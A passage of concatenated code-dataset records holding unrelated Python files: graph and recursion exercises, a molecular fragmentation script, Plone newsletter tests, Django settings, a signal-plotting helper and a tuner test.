","sub_path":"TimeConversion.py","file_name":"TimeConversion.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"26977216","text":"def earliest_ancestor(data, id, ancs=None):\n # Create an empty list for ancestors. Each ancestor will itself be a list that begins with the starting id and ends with the ancestor, with each descendent (if any) in between. It is prepopulated with the provided id.\n if ancs is None:\n ancs = [[id]]\n # Find parents of the current id by looking through data for any list that ends with the id. Add any parents to ancs.\n for i in range(len(data)):\n if data[i][1] == id:\n # Create the correct lineage for new ancestor by finding and copying the lineage for that ancestor's child (which is the current id):\n lineage = [list(ancs[j])\n for j in range(len(ancs)) if ancs[j][-1] == id][0]\n lineage.append(data[i][0])\n # Add new ancestor to the front of ancs if it's a new record for longest lineage; otherwise add new ancestor to the back of ancs.\n ancs.insert(0, lineage) if len(lineage) > len(\n ancs[0]) else ancs.append(lineage)\n # Recursively call earliest_ancestor() on the new ancestor\n earliest_ancestor(data, data[i][0], ancs)\n # Return the earliest ancestor from ancs (the ancestor represented by the longest list). Return lowest id if tied. If len(ancs) is not greater than 1, that means the provided id has no parents: return -1. The following code takes advantage of the fact that ancs is partially sorted such that the earliest ancestor (or one which is tied) is in the front of ancs.\n return min([x[-1] for x in ancs if len(\n x) == len(ancs[0])]) if len(ancs) > 1 else -1\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"233535516","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport time\nimport os\n\nclass ExtractExamplesBasedOnWordCount:\n\n @staticmethod\n def extractExamplesBasedOnWordCount(numberWords):\n space_id = os.environ.get('SPACE_ID')\n directory = './input/' + space_id + '/'\n out_name = str(numberWords) + '.txt' # numberWords is an int, so convert before building the path\n\n # Loop round each filename in directory, collecting lines whose word count matches\n with open(directory + out_name, 'a+') as f:\n for filename in os.listdir(directory):\n if filename == out_name:\n continue # skip the output file itself\n intent = os.path.splitext(filename)[0]\n with open(directory + filename, 'r') as file:\n for line in file:\n space_count = line.count(' ')\n if space_count == numberWords - 1:\n f.write(line)\n\n# if __name__== \"__main__\":\n#     main()\n\nExtractExamplesBasedOnWordCount.extractExamplesBasedOnWordCount(1)\n","sub_path":"extractwordsmatchingcount.py","file_name":"extractwordsmatchingcount.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"319782515","text":"import sys\nimport os\nfrom sys import argv\nimport xml.etree.ElementTree as ET\nfrom shutil import copyfile\nimport copy\nimport pickle\nimport numpy as np\nfrom numba import jit\n\n'''\nAdd a pre-screening for overlap of fragments so you don't bother checking so many. Make it an atom property so that smaller pieces are inherently faster.\n'''\n\n\nscript, system_name, eta, scratchdir = argv\n\nsrc_file = system_name+\".cml\"\n\nclass element:\n def __init__(self, cov1, cov2, cov3):\n self.c1 = cov1\n self.c2 = cov2\n self.c3 = cov3\n\nH = element(.32, -100, -100)\nHe = element(.46, -100, -100)\nLi = element(1.33,1.24,-100)\nBe = element(1.02,.90,.85)\nB = element(.85,.78,.73)\nC = element(.75,.67,.60)\nN = element(.71,.60,.54)\nO = element(.63,.57,.53)\nF = element(.57,.64,.59)\nNe = element(.58,.67,.96)\nNa = element(1.66,1.55,1.60)\nMg = element(1.41,1.39,1.32)\nAl = element(1.21,1.26,1.13)\nSi = element(1.11,1.16,1.07)\nP = element(1.07,1.11,1.02)\nS = element(1.05,1.03,.94)\nCl = element(1.02,.99,.95)\nAr = element(1.06,.96,.107)\nK = element(2.03,1.96,1.93)\nCa = element(1.76,1.71,1.47)\nSc = element(1.48,1.16,1.14)\nTi = element(1.36,1.17,1.08)\nV = element(1.34,1.12,1.06)\nCr = element(1.39,1.22,1.11)\nMn = element(1.19,1.05,1.03)\nFe = element(1.16,1.09,1.02)\nCo = element(1.11,1.03,.96)\nNi = element(1.10,1.01,1.01)\nCu = element(1.12,1.115,1.2)\nZn = element(1.18,1.2,-100)\nGa = element(1.24,1.17,1.21)\nGe = element(1.21,1.11,1.14)\nAs = element(1.21,1.14,1.06)\nSe = element(1.16,1.07,1.07)\nBr = element(1.2,1.14,1.09)\nKr = element(1.17,1.21,1.08)\nRb = element(2.1,2.02,-100)\nSr = element(.185,.157,.139)\nY = element(.163,.130,.124)\nZr = element(1.54,1.27,1.21)\nNb = element(1.47,1.25,1.16)\nMo = element(1.38,1.21,1.13)\nTc = element(1.28,1.2,1.1)\nRu = element(1.25,1.14,1.03)\nRh = element(1.25,1.1,1.06)\nPd = element(1.2,1.17,1.12)\nAg = element(1.28,1.39,1.37)\nCd = element(1.36,1.44,-100)\nIn = element(1.42,1.36,1.46)\nSn = element(1.4,1.3,1.32)\n\ntree = ET.parse(src_file)\nroot = tree.getroot()\n\n
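# a 'unit' is a minimal bonded group of atoms (multiple bonds, or bonds to hydrogen) that is never split across fragments - see Find_Units below\nclass unit:\n def 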
__init__(self, atom_list):\n self.atom_list = atom_list\n\n\n#tail = staying atom, tip = leaving atom (these are atom objects)\nclass disconnect_vector:\n def __init__(self, tail, tip):\n self.tail = tail\n self.tip = tip\n self.cart_tail = np.asarray([float(root[0][tail.no].attrib['x3']),float(root[0][tail.no].attrib['y3']),float(root[0][tail.no].attrib['z3'])])\n self.cart_tip = np.asarray([float(root[0][tip.no].attrib['x3']),float(root[0][tip.no].attrib['y3']),float(root[0][tip.no].attrib['z3'])])\n self.real_vec = self.cart_tip - self.cart_tail\n self.real_dist = np.linalg.norm(self.real_vec)\n self.radial_factor = self.real_dist/(tail.cov+tip.cov)\n self.conversion_factor = self.radial_factor*(tail.cov+.32)/(tail.cov+tip.cov)\n self.new_vec = self.conversion_factor*self.real_vec\n\n\nclass atom:\n def __init__(self, number, unit_obj):\n self.unit = unit_obj\n self.no = number\n self.cov = eval(root[0][number].attrib['elementType']).c1\n self.bond_list = []\n for atom_no in range(0, len(root[0])):\n if atom_no != self.no and bmat[atom_no][number]!= 0:\n self.bond_list.append(atom_no)\n\ndef Local_Units(unit_i):\n locals = set([])\n for atom_i in unit_i.atom_list:\n for atom_j in range(0, len(root[0])):\n if bmat[atom_i][atom_j] != 0 and atom_j not in unit_i.atom_list:\n locals.add(atoms[atom_j].unit)\n return locals\n\ndef Collect_Vectors(atom_list):\n vectors = []\n for atom_i in atom_list:\n for atom_j in atoms:\n if atom_j.no not in atom_list and bmat[atom_i][atom_j.no]!=0:\n vectors.append(disconnect_vector(atoms[atom_i], atom_j))\n return vectors\n\n\nclass fund_frag:\n def __init__(self, unit_obj):\n self.unit_list = set([unit_obj])\n for i in range(0, int(eta)):\n units_to_add = set([])\n for unit_i in self.unit_list:\n units_to_add = units_to_add.union(Local_Units(unit_i))\n self.unit_list = self.unit_list.union(units_to_add)\n self.atom_list = []\n for unit_l in self.unit_list:\n for atom_l in unit_l.atom_list:\n self.atom_list.append(atom_l)\n Done = False\n while Done == False:\n self.vectors = Collect_Vectors(self.atom_list)\n Done = True\n for vector in self.vectors:\n for vector2 in self.vectors:\n if vector != vector2 and vector.tip == vector2.tip:\n self.unit_list.add(vector.tip.unit)\n for atom_q in vector.tip.unit.atom_list:\n self.atom_list.append(atom_q)\n self.atom_list = set(self.atom_list)\n self.atom_list = list(self.atom_list)\n Done = False\n\ndef Compute_Overlap(f1, f2):\n return set(f1.atom_list).intersection(set(f2.atom_list))\n\n\nclass true_frag:\n def __init__(self, fund_list, order):\n self.order = order\n self.funds = set(fund_list)\n self.atom_list = []\n self.overlap = []\n self.frag_list = set([self])\n for atom_i in range(0, len(root[0])):\n Add = True\n for fund in self.funds:\n if atom_i not in fund.atom_list:\n Add = False\n if Add == True:\n self.atom_list.append(atom_i)\n self.vectors = []\n\n def Get_Vectors(self):\n self.vectors = Collect_Vectors(self.atom_list)\n\ndef Get_Fund_Frags(units):\n fund_frags = []\n for unit_i in units:\n fund_frags.append(fund_frag(unit_i))\n for frag in fund_frags:\n if frag!= fund_frags[-1] and set(fund_frags[-1].atom_list).issubset(set(frag.atom_list)):\n fund_frags.pop()\n return fund_frags\n\ndef Get_Bond_String(atom1, atom2, cml_filename):\n id1 = root[0][atom1].attrib[\"id\"]\n id2 = root[0][atom2].attrib[\"id\"]\n bond_string = str(id1)+\" \"+str(id2)\n return bond_string\n\ndef Initialize_Bond_Mat():\n bmat = []\n for atom1 in range(0, atom_count):\n bmat.append([])\n for atom2 in range(0, 
atom_count):\n bmat[atom1].append(0)\n return bmat\n\ndef Get_Bond_Mat(cml_filename):\n tree1 = copy.copy(tree)\n root1 = copy.copy(root)\n bmat = Initialize_Bond_Mat()\n for atom1 in range(0, atom_count):\n for atom2 in range(atom1, atom_count):\n for bond in root1[1]:\n bond_string = Get_Bond_String(atom1, atom2, cml_filename)\n bond_string_dos = Get_Bond_String(atom2, atom1, cml_filename)\n if bond_string == bond.attrib['atomRefs2'] or bond_string_dos == bond.attrib['atomRefs2']:\n bmat[atom1][atom2] = int(bond.attrib['order'])\n bmat[atom2][atom1] = int(bond.attrib['order'])\n return bmat\n\n#Units are the pre-primitive fragments which can never be separated, e.g. C=O, CH3, etc.)\ndef Find_Units():\n units = []\n unassigned = []\n for atom_i in range(0, len(root[0])):\n tmp_unit = [atom_i]\n Unassigned = True\n for unit_i in units:\n if atom_i in unit_i.atom_list:\n Unassigned = False\n break\n if Unassigned == True:\n Done = False\n while Done == False:\n Done = True\n append_list = []\n for atom_j in tmp_unit:\n for atom_k in range(0, len(root[0])):\n if atom_k not in tmp_unit and atom_k not in append_list:\n if bmat[atom_j][atom_k]>1 or (bmat[atom_j][atom_k]==1 and (root[0][atom_j].attrib['elementType']=='H' or root[0][atom_k].attrib['elementType']=='H')):\n append_list.append(atom_k)\n Done = False\n for atom_l in append_list:\n tmp_unit.append(atom_l)\n units.append(unit(tmp_unit))\n return units\n\ndef Make_Atoms(units):\n atoms = []\n for unit_i in units:\n for atom_i in unit_i.atom_list:\n atoms.append(atom(atom_i, unit_i))\n atoms.sort(key=lambda x: x.no)\n return atoms\n\ndef Cull(frag_list):\n clear = []\n for fragment in frag_list:\n for fragment2 in frag_list:\n if fragment!=fragment2 and set(fragment.atom_list) == set(fragment2.atom_list):\n clear.append(fragment)\n clear = set(clear)\n clear = list(clear)\n if clear != []:\n clear.pop()\n for fragment in clear:\n if fragment in frag_list:\n frag_list.remove(fragment)\n clear = []\n for fragment in frag_list:\n for fragment2 in frag_list:\n if fragment!=fragment2 and set(fragment.atom_list).issubset(set(fragment2.atom_list)):\n clear.append(fragment)\n for fragment in clear:\n if fragment in frag_list:\n frag_list.remove(fragment)\n return frag_list\n\ndef Get_True_Frags(fund_frags):\n frags = []\n for frag in fund_frags:\n frags.append(true_frag([frag],1))\n return frags\n\ndef InListFrags(frags, f1, f2, start):\n fundy = set(frags[f1].funds).union(set(frags[f2].funds))\n for fragment in range(start, len(frags)):\n if set(fundy) == set(frags[fragment].funds):\n return True\n return False\n\ndef Find_Frags(frags, order, new_frags):\n Done = True\n newer_frags = []\n for f1 in new_frags:\n for f2 in f1.overlap:\n Add = True\n if Compute_Overlap(f1, f2)==set([]):\n break\n blah = f1.funds.union(f2.funds)\n for f3 in newer_frags:\n if blah == f3.funds:\n Add = False\n if Add == True:\n blah2 = f1.frag_list.union(f2.frag_list)\n new_overlap = set(f1.overlap).intersection(set(f2.overlap))\n temp_frag = true_frag(blah, order)\n frags.append(temp_frag)\n newer_frags.append(temp_frag)\n frags[-1].frag_list = (blah2)\n frags[-1].overlap = new_overlap\n newer_frags[-1].overlap = new_overlap\n newer_frags[-1].frag_list = (blah2)\n Done = False\n print(order)\n print(len(frags))\n if Done == False:\n Find_Frags(frags, order+1, newer_frags)\n return frags\n\ndef Get_Overlaps(fragment, frags):\n for frag2 in frags:\n Add = False\n for atom2 in frag2.atom_list:\n if frag2 != fragment and atom2 in fragment.atom_list:\n 
fragment.overlap.append(frag2)\n break\n return set(fragment.overlap)\n\natom_count = len(root[0])\nbmat = Get_Bond_Mat(src_file)\nunits = Find_Units()\nfirst_order_frags = []\natoms = Make_Atoms(units)\nfund_frags = Get_Fund_Frags(units)\nfund_frags = Cull(fund_frags)\nfrags = Get_True_Frags(fund_frags)\nfor fragment in frags:\n fragment.overlap = Get_Overlaps(fragment, frags)\nstop = len(frags)\nFind_Frags(frags, 2, copy.copy(frags))\nfor frag in frags:\n print (frag.order)\n print (frag.atom_list)\n","sub_path":"frag_prog_delta.py","file_name":"frag_prog_delta.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260511549","text":"# -*- coding: utf-8 -*- \n\n# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:\n#Copyright (c) 2005 Ali Afshar aafshar@gmail.com\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\nimport gtk\nimport pida.core.service as service\nimport pida.core.document as document\nfrom pida.core import actions\n\ntypes = service.types\ndefs = service.definitions\n\nimport glob\nimport sre\n\nclass document_type_handler(service.service):\n\n class fallback_handler(defs.document_handler):\n \"\"\"The fallback buffer creator.\"\"\"\n\n globs = None\n\n def create_document(self, filename, document_type=None, **kw):\n if document_type is None:\n document_type = document.realfile_document\n doc = document_type(filename=filename,\n handler=self, **kw)\n return doc\n\n def view_document(self, document):\n self.service.get_service('editormanager').call('edit',\n filename=document.filename)\n\n def close_document(self, document):\n self.service.boss.call_command('editormanager', 'close',\n filename=document.filename)\n\n @actions.action(stock_id=gtk.STOCK_REDO, label=None)\n def act_redo(self, action):\n \"\"\"Redo the undone action\"\"\"\n self.service.boss.call_command('editormanager', 'redo')\n\n @actions.action(stock_id=gtk.STOCK_UNDO, label=None, is_important=True)\n def act_undo(self, action):\n \"\"\"Undo the last action\"\"\"\n self.service.boss.call_command('editormanager', 'undo')\n\n @actions.action(stock_id=gtk.STOCK_CUT, label=None)\n def act_cut(self, action):\n \"\"\"Cut the selection\"\"\"\n self.service.boss.call_command('editormanager', 'cut')\n\n @actions.action(stock_id=gtk.STOCK_COPY, label=None)\n def act_copy(self, action):\n \"\"\"Copy the selection\"\"\"\n self.service.boss.call_command('editormanager', 'copy')\n\n @actions.action(stock_id=gtk.STOCK_PASTE, 
label=None)\n def act_paste(self, action):\n \"\"\"Paste the clipboard\"\"\"\n self.service.boss.call_command('editormanager', 'paste')\n\n @actions.action(stock_id=gtk.STOCK_SAVE,\n label=None,\n is_important=True,\n name=\"DocumentSave\")\n def act_save(self, action):\n \"\"\"Save the document\"\"\"\n self.service.boss.call_command('editormanager', 'save')\n\n @actions.action(stock_id=gtk.STOCK_REVERT_TO_SAVED, label=None)\n def act_revert(self, action):\n \"\"\"Reverts a document\"\"\"\n self.service.boss.call_command('editormanager', 'revert')\n\n def get_menu_definition(self):\n return \"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n\n def init(self):\n self.__files = {}\n self.__file_fallback = None\n self.__action_groups = {}\n\n def cmd_register_file_handler(self, handler):\n \"\"\"Register buffer handler\"\"\"\n if handler.globs is None:\n self.__file_fallback = handler(self)\n else:\n self.__register_patterns(self.__files, handler)\n\n def cmd_create_document(self, filename, document_type=None, **kw):\n handler = (self.__get_file_handler(filename) or\n self.__file_fallback)\n doc = handler.create_document(filename, document_type, **kw)\n handler.view_document(doc)\n if handler not in self.__action_groups:\n self.boss.call_command('window', 'register_action_group',\n actiongroup=handler.action_group,\n uidefinition=handler.get_menu_definition())\n self.__action_groups[handler] = handler.action_group\n handler.action_group.set_visible(False)\n return doc\n\n def cmd_get_document_actions(self):\n return self.__file_fallback.action_group.list_actions()\n\n def cmd_disable_document_accelerators(self):\n for act in self.__file_fallback.action_group.list_actions():\n gtk.accel_map_change_entry(act.accel_path, 0, 0, True)\n\n def __register_patterns(self, handlers, handler, attrname='globs'):\n patterns = getattr(handler, attrname, [])\n for glob_pattern in patterns:\n re_pattern = glob.fnmatch.translate(glob_pattern)\n pattern = sre.compile(re_pattern)\n handlers[pattern] = handler(handler.service)\n \n def __get_file_handler(self, filename):\n if filename is None:\n return False\n for pattern in self.__files:\n if pattern.match(filename):\n return self.__files[pattern]\n\nService = document_type_handler\n","sub_path":"tags/release-0.3.1/trunk/pida/services/documenttypes.py","file_name":"documenttypes.py","file_ext":"py","file_size_in_byte":8052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97156099","text":"# 2021 04 14 14:15 ~ 30\n# 다익스트라. 
globals: graph, distance - count the nodes at the maximum shortest distance\nimport heapq\nimport sys\ninput = sys.stdin.readline\nINF = (1e9)\n\ndef dijkstra(start):\n q = []\n\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n dist, now = heapq.heappop(q)\n if distance[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n\n\ndef solution(n, edge):\n answer = 0\n global graph\n global distance\n graph = [[] for i in range(n+1)]\n distance = [INF] * (n+1)\n\n for value in edge:\n a, b = value\n graph[a].append((b, 1))\n graph[b].append((a, 1))\n\n start = 1\n dijkstra(start)\n\n # print(distance)\n\n maxValue = 0\n for i in distance:\n if i != INF and maxValue < i:\n maxValue = i\n\n print(\"maxValue:\", maxValue)\n answer = distance.count(maxValue)\n\n return answer","sub_path":"그래프/[다익스트라]가장먼노드.py","file_name":"[다익스트라]가장먼노드.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"271458412","text":"tests = int(input())\nvowels = ('a', 'e', 'i', 'o', 'u')\nfor i in range(tests):\n lower = 0\n upper = 0\n string = input()\n for j in vowels:\n if j in string:\n lower += 1\n if j.upper() in string:\n upper += 1\n if lower == 5 or upper == 5:\n print('lovely string')\n else:\n print('ugly string')\n\n\n","sub_path":"StringP1.py","file_name":"StringP1.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"245920779","text":"\n# # iterator example\n# L = [2, 3, 5, 7]\n# it = iter(L) # iter() returns an iterator, bound to it\n# next(it) # 2\n# next(it) # 3\n# next(it) # 5\n# next(it) # 7\n# next(it) # StopIteration # tells the caller of next() that no data is left\n\n\n# # exercise 1\n# s = {'工商银行', '建设银行', '中国银行', '农业银行'}\n\n# # #1\n# # for x in s:\n# # print(x)\n\n# #2\n# s_it = iter(s)\n# while True:\n# try:\n# x = next(s_it)\n# print(x)\n# except StopIteration:\n# break\n\n\n# # yield example\n# def myyield():\n# yield 2\n# yield 2 + 1\n# yield 5\n# yield 7\n# print('generator function call finished')\n\n# gen = myyield()\n# it = iter(gen)\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# # print(next(it))\n\n# exercise 2\ndef my_enum():\n L = []\n while True:\n s = input('input:')\n if not s:\n break\n L.append(s)\n for t in enumerate(L, 1):\n print('line %d: %s' % t)\n\nmy_enum()","sub_path":"pbase/day15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"403557254","text":"from .base import *\n\nDEBUG = True\nALLOWED_HOSTS = [\"*\"]\n\nemail_backend = env(\"EMAIL_BACKEND\", \"file\")\nif email_backend == \"file\":\n EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'\n EMAIL_FILE_PATH = './emails'\n os.makedirs(\"./emails\", exist_ok=True)\n\nGEOIP_PATH = os.path.abspath(os.path.join(BASE_DIR, \"../../resources/geolite\"))\n","sub_path":"server/src/server/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"278799227","text":"# -*- coding: utf-8 -*-\nfrom Acquisition import aq_base\nfrom plone.app.testing import TEST_USER_ID, setRoles\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.tests.utils import MockMailHost\n
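# MockMailHost records outgoing mail in memory so the tests can assert on sent messages\nfrom Products.EasyNewsletter.interfaces import IENLIssue\nfrom 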
Products.EasyNewsletter.testing import EASYNEWSLETTER_INTEGRATION_TESTING\nfrom Products.MailHost.interfaces import IMailHost\nfrom zExceptions import BadRequest\nfrom zope.component import getMultiAdapter\nfrom zope.component import getSiteManager\n\nimport unittest2 as unittest\n\n\nclass DailyIssueBaseTestCase(unittest.TestCase):\n \"\"\"Test case sending a daily Newsletter issue\"\"\"\n\n layer = EASYNEWSLETTER_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer[\"portal\"]\n self.catalog = getToolByName(self.portal, \"portal_catalog\")\n setRoles(self.portal, TEST_USER_ID, [\"Manager\"])\n\n #creating test objects: folder, news, newsletter and subscriber\n self.portal.invokeFactory(\"Folder\", \"testfolder\")\n self.folder = self.portal[\"testfolder\"]\n self.folder.invokeFactory(\"News Item\", \"news01\")\n\n self.folder.invokeFactory(\"EasyNewsletter\", \"daily-news\")\n self.newsletter = self.folder[\"daily-news\"]\n self.newsletter.setTitle(\"Daily News\")\n\n criteria = self.newsletter.addCriterion(\n \"portal_type\",\n \"ATSimpleStringCriterion\"\n )\n criteria.setValue(\"News Item\")\n\n self.newsletter.invokeFactory(\"ENLSubscriber\", \"subscriber01\")\n self.view = getMultiAdapter(\n (self.newsletter, self.layer[\"request\"]),\n name=\"daily-issue\"\n )\n\n #setting a Mock mailhost\n self.portal._original_MailHost = self.portal.MailHost\n self.portal.MailHost = mailhost = MockMailHost(\"MailHost\")\n sm = getSiteManager(context=self.portal)\n sm.unregisterUtility(provided=IMailHost)\n sm.registerUtility(mailhost, provided=IMailHost)\n\n self.portal.email_from_address = \"noreply@plone.org\"\n\n def tearDown(self):\n self.portal.MailHost = self.portal._original_MailHost\n sm = getSiteManager(context=self.portal)\n sm.unregisterUtility(provided=IMailHost)\n sm.registerUtility(\n aq_base(self.portal._original_MailHost),\n provided=IMailHost\n )\n\n\nclass DailyIssueContent(DailyIssueBaseTestCase):\n def test_create_new_issue(self):\n issues = self.catalog(\n object_provides=IENLIssue.__identifier__,\n path=\"/\".join(self.newsletter.getPhysicalPath())\n )\n self.assertEqual(len(issues), 0)\n self.assertFalse(self.view.already_sent())\n try:\n self.view.create_issue()\n except Exception:\n self.fail(\"Couldn't create an issue!\")\n\n issues = self.catalog(\n object_provides=IENLIssue.__identifier__,\n path=\"/\".join(self.newsletter.getPhysicalPath())\n )\n\n self.assertTrue(self.view.already_sent())\n self.assertEqual(len(issues), 1)\n self.assertEqual(self.view.issue.Title(), \"Daily News\")\n\n def test_empty_issue(self):\n self.assertTrue(self.view.has_content())\n self.folder.manage_delObjects([\"news01\"])\n self.assertFalse(self.view.has_content())\n\n def test_send_issue(self):\n try:\n self.view.create_issue()\n except Exception:\n self.fail(\"Couldn't create issue!\")\n\n self.view.send()\n self.assertEqual(len(self.portal.MailHost.messages), 1)\n\n\nclass DailyIssueMethodGET(DailyIssueBaseTestCase):\n\n def setUp(self):\n self.layer[\"request\"][\"REQUEST_METHOD\"] = \"GET\"\n DailyIssueBaseTestCase.setUp(self)\n\n def test_get_with_an_empty_issue(self):\n self.folder.manage_delObjects([\"news01\"])\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 204)\n\n def test_get_with_a_non_empty_issue(self):\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 100)\n\n def test_get_an_alredy_sent_issue(self):\n self.view.create_issue()\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 
200)\n\n\nclass DailyIssueMethodPOST(DailyIssueBaseTestCase):\n\n def setUp(self):\n self.layer[\"request\"][\"REQUEST_METHOD\"] = \"POST\"\n DailyIssueBaseTestCase.setUp(self)\n\n def test_do_not_create_or_send_an_empty_issue(self):\n self.folder.manage_delObjects([\"news01\"])\n self.view()\n issues = self.catalog(\n object_provides=IENLIssue.__identifier__,\n path=\"/\".join(self.newsletter.getPhysicalPath())\n )\n self.assertFalse(issues)\n self.assertEqual(self.view.request.response.getStatus(), 204)\n self.assertEqual(len(self.portal.MailHost.messages), 0)\n\n def test_send_issue_and_check_http_status(self):\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 200)\n self.assertEqual(len(self.portal.MailHost.messages), 1)\n\n def test_do_not_send_same_issue_twice(self):\n self.view() # 200 OK\n self.assertEqual(self.view.request.response.getStatus(), 200)\n self.assertRaises(BadRequest, self.view.create_issue)\n self.view() # 409 Already Sent\n self.assertEqual(self.view.request.response.getStatus(), 409)\n\n\nclass DailyIssueMethodOtherThanGETorPOST(DailyIssueBaseTestCase):\n\n def setUp(self):\n self.layer[\"request\"][\"REQUEST_METHOD\"] = \"FOOBAR\"\n DailyIssueBaseTestCase.setUp(self)\n\n def test_trying_another_method_on_view(self):\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 405)\n self.assertEqual(\n self.view.request.response.getHeader(\"Allow\"),\n \"GET, POST\"\n )\n\n\ndef test_suite():\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","sub_path":"Products/EasyNewsletter/tests/test_daily_issue.py","file_name":"test_daily_issue.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"123618985","text":"import h5py\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nSIGNALS_NAME = [\n \"AbdoBelt\",\n \"AirFlow\",\n \"PPG\",\n \"ThorBelt\",\n \"Snoring\",\n \"SPO2\",\n \"C4A1\",\n \"O2A1\",\n]\n\n\ndef extract_events_from_binary_mask(binary_mask, fs=1):\n binary_mask = np.array([0] + binary_mask.tolist() + [0])\n diff_data = np.diff(binary_mask)\n starts = np.where(diff_data == 1)[0] / fs\n ends = np.where(diff_data == -1)[0] / fs\n\n assert len(starts) == len(ends)\n events = []\n for i, _ in enumerate(starts):\n events += [(starts[i], ends[i])]\n\n return events\n\n\ndef visualize_signal_and_event(X, mask, signals_name=SIGNALS_NAME, signal_freq=100):\n n_signal = X.shape[0]\n fig, axs = plt.subplots(n_signal, sharex=True)\n events = extract_events_from_binary_mask(mask)\n for i in range(n_signal):\n axs[i].plot(np.arange(0, X[i].shape[0]) / signal_freq, X[i])\n axs[i].set_ylabel(signals_name[i])\n for elt in events:\n axs[i].axvspan(elt[0], elt[1], color='red', alpha=0.3)\n plt.xlim(0, X[0].shape[0]/ signal_freq)\n plt.show()\n\n\ndef visualise_index(idx, data_h5, masks, N_signals=8):\n x = data_h5['data'][idx, 2:]\n x = x.reshape(N_signals, -1)\n visualize_signal_and_event(x, np.array(masks[idx, 1:]))\n\n\nif __name__ == \"__main__\":\n import h5py\n PATH_TO_TRAINING_DATA = \"\"\n PATH_TO_TRAINING_TARGET = \"\"\n h5_file = h5py.File(PATH_TO_TRAINING_DATA)\n mask = np.array(pd.read_csv(PATH_TO_TRAINING_TARGET))\n visualise_index(0, h5_file, mask)\n","sub_path":"Dreem_functions/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"417413671","text":"from 
selftf.lib.tuner import PSTunerTrainingData, PSTunerConfiguration, GPTrainingModel, TensorFlowConfigurationManager, \\\n TFConfigUtil\nimport logging\nimport unittest\n\n\nclass TestTuner(unittest.TestCase):\n def test_gp(self):\n c1 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n c2 = PSTunerConfiguration(\n num_ps=1,\n num_worker=3,\n inter_op_parallelism_threads=14,\n intra_op_parallelism_threads=2\n )\n c3 = PSTunerConfiguration(\n num_ps=3,\n num_worker=1,\n inter_op_parallelism_threads=2,\n intra_op_parallelism_threads=14\n )\n d1 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=1,\n loss=0.3,\n step=1\n )\n d2 = PSTunerTrainingData(\n ps_config=c2,\n elapsed_time_in_ms=2,\n loss=0.2,\n step=2\n )\n d3 = PSTunerTrainingData(\n ps_config=c3,\n elapsed_time_in_ms=3,\n loss=0.2,\n step=3\n )\n\n list_training_data = [d1, d2, d3]\n\n tfcm = TensorFlowConfigurationManager(lambda: 4, lambda: 16, (0.00001, 0.0001), (1000, 10000))\n 